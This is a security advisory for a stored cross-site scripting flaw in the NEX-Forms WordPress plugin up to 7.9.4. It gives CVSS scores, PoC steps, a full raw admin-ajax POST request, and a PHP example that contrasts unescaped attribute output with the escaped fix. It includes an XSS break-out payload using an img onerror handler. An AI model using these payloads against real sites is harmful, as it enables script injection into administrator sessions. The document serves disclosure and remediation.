WPVDB-ID: ECA883D8-9499-4DBD-8FE1-4447FC2CA28A

NEX-Forms <= 7.9.4 - Multiple Admin+ Stored Cross-Site Scripting

2021-11-15
Shivam Rai
wpscan.com

CVSS3: 4.8 Medium
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: HIGH
User Interaction: REQUIRED
Scope: CHANGED
Confidentiality Impact: LOW
Integrity Impact: LOW
Availability Impact: NONE
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N

CVSS2: 3.5 Low
Access Vector: NETWORK
Access Complexity: MEDIUM
Authentication: SINGLE
Confidentiality Impact: NONE
Integrity Impact: PARTIAL
Availability Impact: NONE
AV:N/AC:M/Au:S/C:N/I:P/A:N

The plugin does not escape some of its settings and form fields before outputting them in HTML attributes, which could allow high-privilege (admin+) users to perform stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed.

PoC

1. In Global Setting > Preferences > Validation, put the following payload in the Required Field, Incorrect Email, Incorrect URL or Alphabetical settings:

">

2. In Global Setting > Preferences > Emails > Email Autoresponder (User emails) > Subject setting:

">

The XSS will be triggered when viewing the NEX-Forms dashboard (/wp-admin/admin.php?page=nex-forms-dashboard).

3. Create a new form, add a Name field and put the following payload as the Field Label Text:

">

Corresponding request (cookie redacted):

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 6228
Connection: close
Cookie: [admin+]

action=nf_update_record&table=wap_nex_forms&edit_Id=2&plugin=shared&title=aa&form_fields=&clean_html=dummy&is_form=1&is_template=0&post_type=POST&post_action=ajax&custom_url=&mail_to=admin%40localhost.org&from_address=admin%40localhost.org&from_name=WP&on_screen_confirmation_message=dummy&on_screen_confirmation_message_admin=&google_analytics_conversion_code=&confirmation_page=&user_email_field=&confirmation_mail_subject=WP±+NEX-Forms+Submission&user_confirmation_mail_subject=WP±+NEX-Forms+Submission%5C&confirmation_mail_body=Thank+you+for+connecting+with+us.+We+will+respond+to+you+shortly.&on_form_submission=message&form_hidden_fields=&hidden_fields=&conditional_logic=&conditional_logic_array=&admin_email_body=%7B%7Bnf_form_data%7D%7D&bcc=&bcc_user_mail=&custom_css=&form_type=&draft_Id=0&products=&currency_code=USD&email_on_payment_success=&cmd=_cart&lc=US&mc_field_map=&gr_field_map=&mp_field_map=&ms_field_map=&email_subscription=&attach_pdf_to_email=&form_to_post_map=&md_theme%5B0%5D%5Btheme_name%5D=default&md_theme%5B0%5D%5Btheme_shade%5D=light&md_theme%5B0%5D%5Boverall_font%5D=&md_theme%5B0%5D%5Bfield_spacing%5D=15&md_theme%5B0%5D%5Boverall_label_font%5D=&md_theme%5B0%5D%5Boverall_label_font_size%5D=13&md_theme%5B0%5D%5Boverall_label_align%5D=left&md_theme%5B0%5D%5Boverall_label_color%5D=%239e9e9e&md_theme%5B0%5D%5Boverall_label_bold%5D=bold&md_theme%5B0%5D%5Boverall_label_italic%5D=not-italic&md_theme%5B0%5D%5Boverall_label_underline%5D=not-underline&md_theme%5B0%5D%5Boverall_input_font%5D=&md_theme%5B0%5D%5Boverall_input_font_size%5D=13&md_theme%5B0%5D%5Boverall_input_align%5D=left&md_theme%5B0%5D%5Boverall_input_color%5D=%239e9e9e&md_theme%5B0%5D%5Boverall_input_bg_color%5D=white&md_theme%5B0%5D%5Boverall_input_border_color%5D=%23dddddd&md_theme%5B0%5D%5Boverall_input_bold%5D=0&md_theme%5B0%5D%5Boverall_input_italic%5D=0&md_theme%5B0%5D%5Boverall_input_underline%5D=0&md_theme%5B0%5D%5Boverall_field_corners%5D=normal&md_theme%5B0%5D%5Boverall_icon_font_size%5D=17&md_theme%5B0%5D%5Boverall_icon_color%5D=%23888888&md_theme%5B0%5D%5Boverall_icon_bg_color%5D=white&md_theme%5B0%5D%5Boverall_icon_border_color%5D=%23dddddd&md_theme%5B0%5D%5Boverall_field_errors%5D=modern&md_theme%5B0%5D%5Boverall_field_errors_pos%5D=right&md_theme%5B0%5D%5Bmsg_hide_form%5D=yes&md_theme%5B0%5D%5Bmsg_position%5D=top&md_theme%5B0%5D%5Bmsg_placement%5D=outside&md_theme%5B0%5D%5Bloader_type%5D=ellipsis&md_theme%5B0%5D%5Bloader_color%5D=%2340C4FF&form_theme=bootstrap&jq_theme=default&form_style=background%3A+%23fff%3B+box-shadow%3A+rgba(0%2C+0%2C+0%2C+0.2)+0px+7px+16px+0px%3B+border-radius%3A+4px%3B+padding%3A+30px%3B+border-color%3A%23ddd%3B&msg_style=background%3A+%23fff%3B+box-shadow%3A+rgba(0%2C+0%2C+0%2C+0.2)+0px+7px+16px+0px%3B+border-radius%3A+4px%3B+padding%3A+30px%3B+border-color%3A%23ddd%3B&multistep_settings%5B0%5D%5Bmulti_step_total%5D=0&multistep_settings%5B0%5D%5Bmulti_step_stepping%5D=&multistep_settings%5B0%5D%5Bmulti_step_transition_in%5D=fadeIn&multistep_settings%5B0%5D%5Bmulti_step_transition_out%5D=fadeOut&multistep_settings%5B0%5D%5Bmulti_step_back_disabled%5D=no&multistep_settings%5B0%5D%5Bbreadcrumb_list%5D=%0A%09%09%09%09%09%09%09%09%09%09%0A%09%09%09%09%09%09%09%09%09%09%0A%09%09%09%09%09%09%09%09%09%09%0A%09%09%09%09%09%09%09%09%09%09&multistep_settings%5B0%5D%5Bbreadcrumb_type%5D=pilled&multistep_settings%5B0%5D%5Btext_pos%5D=text-bottom&multistep_settings%5B0%5D%5Bcrumb_align%5D=align_left&multistep_settings%5B0%5D%5Bbc_position%5D=top&multistep_settings%5B0%5D%5Bdata_theme%5D=default&multistep_settings%5B0%5D%5Bshow_front_end%5D=yes&multistep_settings%5B0%5D%5Bshow_inside%5D=no&multistep_settings%5B0%5D%5Bscroll_to_top%5D=yes&multistep_settings%5B0%5D%5Bform_width_pixels%5D=950&multistep_settings%5B0%5D%5Bform_width_percentage%5D=100&multistep_settings%5B0%5D%5Bform_width_unit%5D=%25&multistep_settings%5B0%5D%5Bmsg_width_pixels%5D=950&multistep_settings%5B0%5D%5Bmsg_width_percentage%5D=100&multistep_settings%5B0%5D%5Bmsg_width_unit%5D=%25&multistep_settings%5B0%5D%5Bbc_gutter%5D=20&multistep_settings%5B0%5D%5Bbc_folded%5D=bc-unfolded&multistep_settings%5B0%5D%5Bbc_connected%5D=bc-connected&multistep_settings%5B0%5D%5Bbc_style%5D=bc-solid&multistep_settings%5B0%5D%5Bbc_css%5D=&multistep_settings%5B0%5D%5Bbc_converted%5D=1&multistep_settings%5B0%5D%5Badd_timer%5D=no&multistep_settings%5B0%5D%5Btimer_add_to%5D=header&multistep_settings%5B0%5D%5Btimer_type%5D=overall&multistep_settings%5B0%5D%5Benabled_units%5D=minutes%2Cseconds&multistep_settings%5B0%5D%5Btimer_size%5D=small&multistep_settings%5B0%5D%5Btimer_position%5D=timer_inline&multistep_settings%5B0%5D%5Btimer_align%5D=timer_right&multistep_settings%5B0%5D%5Btimer_animation%5D=smooth&multistep_settings%5B0%5D%5Btimer_hours%5D=0&multistep_settings%5B0%5D%5Btimer_minutes%5D=0&multistep_settings%5B0%5D%5Btimer_seconds%5D=30&multistep_settings%5B0%5D%5Btimer_hours_label%5D=&multistep_settings%5B0%5D%5Btimer_minutes_label%5D=&multistep_settings%5B0%5D%5Btimer_seconds_label%5D=&multistep_settings%5B0%5D%5Btimer_hours_color%5D=%232979ff&multistep_settings%5B0%5D%5Btimer_minutes_color%5D=%2300bcd4&multistep_settings%5B0%5D%5Btimer_seconds_color%5D=%2340c4ff&multistep_settings%5B0%5D%5Btimer_direction%5D=clockwise&multistep_settings%5B0%5D%5Btimer_wrapper_css%5D=&multistep_settings%5B0%5D%5Btimer_text_color%5D=%23888888&multistep_settings%5B0%5D%5Btimer_inner_circle_color%5D=%23aaaaaa&multistep_settings%5B0%5D%5Btimer_bg_width%5D=0.1&multistep_settings%5B0%5D%5Btimer_fg_width%5D=0.05&multistep_settings%5B0%5D%5Btimer_start%5D=1&multistep_settings%5B0%5D%5Btimer_end%5D=0&multistep_html=dummy&upload_settings%5B0%5D%5Bupload_to_server%5D=true&attachment_settings%5B0%5D%5Battach_to_admin_email%5D=true&option_settings%5B0%5D%5Bsave_form_progress%5D=false&option_settings%5B0%5D%5Bsubmit_limit%5D=&option_settings%5B0%5D%5Bsubmit_limit_msg%5D=&option_settings%5B0%5D%5Bsend_admin_email%5D=true&option_settings%5B0%5D%5Bbefore_submit_js%5D=return+true%3B&option_settings%5B0%5D%5Bafter_submit_js%5D=return+true%3B
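The bug class behind the description and the PoC above (a stored setting or form field label echoed into an HTML attribute without escaping), beside the fix a maintainer would apply, as an added example that is not NEX-Forms code or code from this advisory. The option name nf_required_field_msg, the render/store function names and the wp_unslash_compat wrapper are hypothetical; esc_attr(), esc_html(), sanitize_text_field() and wp_unslash() are WordPress core functions, polyfilled here so the file runs under plain php outside WordPress. The payload is constructed for the demo.

```php
<?php
// Added example, not NEX-Forms code: a setting echoed into an HTML attribute
// without escaping, next to the fix. Option and function names are hypothetical;
// esc_attr(), esc_html(), sanitize_text_field() and wp_unslash() are WordPress core.

// Polyfills so the file runs under plain `php` outside WordPress. Inside
// WordPress the real functions are used. These are approximations: core's
// esc_attr() is htmlspecialchars() with ENT_QUOTES plus charset and entity
// normalisation, and sanitize_text_field() also strips line breaks and
// invalid octets.
if (!function_exists('esc_attr')) {
    function esc_attr($text) { return htmlspecialchars((string) $text, ENT_QUOTES, 'UTF-8'); }
}
if (!function_exists('esc_html')) {
    function esc_html($text) { return htmlspecialchars((string) $text, ENT_QUOTES, 'UTF-8'); }
}
if (!function_exists('sanitize_text_field')) {
    function sanitize_text_field($text) { return trim(strip_tags((string) $text)); }
}

// Vulnerable pattern: the stored value lands inside value="..." verbatim.
// A value starting with `">` closes the attribute and the tag, and whatever
// follows is parsed as new markup when the settings page or dashboard renders,
// whatever the viewing user's unfiltered_html capability is.
function render_validation_setting_vulnerable(string $stored): string
{
    return '<input type="text" name="nf_required_field_msg" value="' . $stored . '">';
}

// Fixed pattern: escape at output time for the context the value is used in.
// Attribute context needs esc_attr(); text between tags needs esc_html().
function render_validation_setting_fixed(string $stored): string
{
    return '<input type="text" name="nf_required_field_msg" value="' . esc_attr($stored) . '">';
}

function render_field_label_fixed(string $label): string
{
    return '<label>' . esc_html($label) . '</label>';
}

// WordPress hands POST data to handlers with slashes added; wp_unslash() undoes
// that. Hypothetical wrapper so the example also runs outside WordPress.
function wp_unslash_compat($value): string
{
    return function_exists('wp_unslash') ? wp_unslash($value) : stripslashes((string) $value);
}

// Defence in depth on the save side. Core's kses filtering for users without
// unfiltered_html covers post content, not plugin options or form definitions,
// so the plugin has to sanitise what it stores. A validation message or field
// label is plain text, so sanitize_text_field() fits; it does not replace
// escaping on output.
function store_validation_setting(string $raw): string
{
    return sanitize_text_field(wp_unslash_compat($raw));
}

// Constructed payload for the demo: a generic attribute-context break-out.
$payload = '"><img src=x onerror=alert(document.domain)>';

echo "vulnerable: ", render_validation_setting_vulnerable($payload), PHP_EOL;
echo "fixed:      ", render_validation_setting_fixed($payload), PHP_EOL;
echo "label:      ", render_field_label_fixed($payload), PHP_EOL;
echo "stored:     ", store_validation_setting($payload), PHP_EOL;
```

Run with `php example.php`. In the vulnerable line the constructed value closes the value attribute and the input tag, so the img element becomes live markup; in the fixed line the quote and angle brackets are entity-encoded and stay inside the attribute. The save-side sanitiser strips the tag but leaves the leading `">`, which is why output escaping, not input sanitising, is what prevents the break-out. Every page that renders the validation messages, the autoresponder subject or the form field labels, including the NEX-Forms dashboard named in the PoC, needs the same context-appropriate escaping.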

CPE Name                            Operator  Version
nex-forms-express-wp-form-builder   eq        *
